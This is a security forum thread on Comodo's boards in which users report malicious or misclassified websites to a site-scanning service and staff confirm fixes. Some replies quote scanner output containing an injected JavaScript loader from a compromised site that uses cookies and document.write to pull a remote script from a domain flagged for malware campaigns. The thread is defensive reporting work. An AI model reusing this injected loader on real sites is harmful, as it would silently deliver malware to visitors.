Author Topic: False positives and exploits which are undetected  (Read 126776 times)


Offline malware1

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 3266

Offline kitmub

  • Comodo Loves me
  • ****
  • Posts: 133

Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #108 on: December 26, 2014, 03:45:39 AM »
thanks for your feedback, kitmub. our analysts are working on it.

Offline sithlordadler

  • Comodo's Hero
  • *****
  • Posts: 257
Re: False positives and exploits which are undetected
« Reply #109 on: June 27, 2015, 04:05:00 PM »
(We can report bad websites here also correct?)
https://app.webinspector.com/public/reports/36449380
Mysearchdial(.com) is a broswer hijacker site.

WOT: https://www.mywot.com/en/scorecard/mysearchdial.com

The people who created it might try to convince you that it is not, but it indeed is.
A toolbar of mysearchdial is included in the startmysearchdial browser hijacker
http://malwaretips.com/blogs/start-mysearchdial-removal/
Windows 10, WOT, TOR and google, CIS 10, Malwarebytes free.

Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #110 on: June 30, 2015, 05:43:53 AM »
thanks for your feedback, sithlordadler. i see this site got some dark history. can you point me to binaries on this site. can't see any. i found chrome addon at google store, but its a year old and still there. so i'm in doubt its harmful.


Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #112 on: July 21, 2015, 05:46:00 AM »
thanks for feedback ,  kitmub! changes will be applied shortly.
here is updated report: https://app.webinspector.com/public/reports/37857749
« Last Edit: July 21, 2015, 08:17:23 AM by Slav »

Offline merabet ameur

  • Newbie
  • *
  • Posts: 1
  • merabet ameur
Re: False positives and exploits which are undetected
« Reply #113 on: December 27, 2016, 11:19:38 AM »
bon jour d'unité spesefique traiter en pratique court l'affect connait en marge du l'éducation tous semble virait et étonner en plus sur verbale et villeux séance impressionner et remplît de seriné
en contenance de trouver la solution

Online EricJH

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 23877
Re: False positives and exploits which are undetected
« Reply #114 on: December 30, 2016, 11:57:40 AM »
Amer, welcome to the Comodo Forums. Could you please speak English here in the international part of the board?

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #115 on: April 02, 2017, 11:02:44 AM »
Site trys`s to block access to the Browser and recommends User`s to call a suspicious FAKE Service Hotline .... !!! This site contains a malicious Script and iframe too !!!

http://zulu.zscaler.com/submission/show/e45d157834bd6a0b199ce081020504ee-1491164312

Should be blacklisted and blocked ..... !!!

https://app.webinspector.com/public/reports/68356419?cache=true

« Last Edit: April 02, 2017, 04:28:58 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #116 on: July 20, 2017, 08:55:49 PM »
Should be blacklisted and blocked ..... !!!

h**p://batterychargers.info/image/flags/catalog >>> https://app.webinspector.com/public/reports/73993498 >>> Classified as SAFE !!! Should be classifed as MALICIOUS !!!

http://zulu.zscaler.com/submission/show/1a275edb2a2beeccab23034303badbb4-1500594542

- Too low entropy detected in string : [['<span style="text-decoration: line-through;"><span class="price-old"></span></span> <span class="pri']] of length 115

- Detected encoded JavaScript code commonly used to hide malicious behaviour : [[<script type='text/javascript' language='javascript' >  <!--  function getOptionCount() {   return $("select option:selected[value!='']").length;   }   $(document).on('change', $('.option'), function() {   var totalCount = getOptionCount();



h**p://www.g-cindustries.com/
>>> https://app.webinspector.com/public/reports/73977023?cache=true >>> Classified as SUSPICIOUS !!! Should be classifed as MALICIOUS !!!

http://zulu.zscaler.com/submission/show/2927a7db3b23e9f5bd63e0f6971e7a84-1500521673

- Too low entropy detected in string : [['<a href=\'%26#109;ai%26#108;%26#116;o:%26#105;nf%26#111;%26#64;g-c%26#105;nd%26#117;str%26#105;%26#101;s%26#46;c%26#111;m\'>']] of length 100

- Detected encoded JavaScript code commonly used to hide malicious behaviour : [[<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'h**p://www.bonhoeffer.pl/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'snt2014' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + ... )
« Last Edit: August 08, 2017, 08:19:14 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***

Offline JamesLawrence

  • Newbie
  • *
  • Posts: 1
Re: False positives and exploits which are undetected
« Reply #117 on: July 21, 2017, 04:42:41 AM »
Hi Pio,

Thank you for reporting. It's fixed, updated changes will be reflected shortly.

Kind Regards,
JamesLawrence

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #118 on: August 08, 2017, 08:30:05 PM »

h**p://www.g-cindustries.com/[/b] >>> https://app.webinspector.com/public/reports/73977023?cache=true >>> Classified as SUSPICIOUS !!! Should be classifed as MALICIOUS !!!

The Website uses a malicious java script to contact another malicious Website . Contacted Website "Sucuri" Check >>>  https://sitecheck.sucuri.net/results/www.bonhoeffer.pl

Sucuri Website conclusion : "Domain detected on spam or phishing campaigns. This specific URL was identified in malicious campaigns to disseminate malware. Details: http://labs.sucuri.net/?blacklist=bonhoeffer.pl"

- Too low entropy detected in string : [['<a href=\'%26#109;ai%26#108;%26#116;o:%26#105;nf%26#111;%26#64;g-c%26#105;nd%26#117;str%26#105;%26#101;s%26#46;c%26#111;m\'>']] of length 100

- Detected encoded JavaScript code: [[<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'h**p://www.bonhoeffer.pl/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'snt2014' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + ... )

 :-La :-La :-La Still NOT fixed !!!! :-La :-La :-La  88) The CIS Web Filter doesn't block this Website !!! Firefox does that ..... !!!  ;) Both sites should be classified as malicious ! The status "suspicious" is really outdated .  :)
« Last Edit: August 08, 2017, 09:26:30 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***

Offline amirtha

  • Newbie
  • *
  • Posts: 1
Re: False positives and exploits which are undetected
« Reply #119 on: August 09, 2017, 02:31:28 AM »
Hi Pio,

Thanks for reporting.The changes are updated.It will reflect soon.


Kind Regards,
Amirtha.

 

Free Endpoint Protection
Seo4Smf 2.0 © SmfMod.Com Smf Destek